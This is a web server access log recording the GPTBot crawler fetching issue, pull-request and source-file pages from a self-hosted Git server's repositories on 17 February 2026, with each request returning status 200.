192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 115819] [Gzip 6.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118289] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118426] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:19:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/tags.rss" [Client 74.7.227.38] [Length 345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/tags" -[17/Feb/2026:19:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPostgresPatrol.pkg" [Client 74.7.227.38] [Length 19798] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:19:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 24136] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:19:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11258] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:19:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 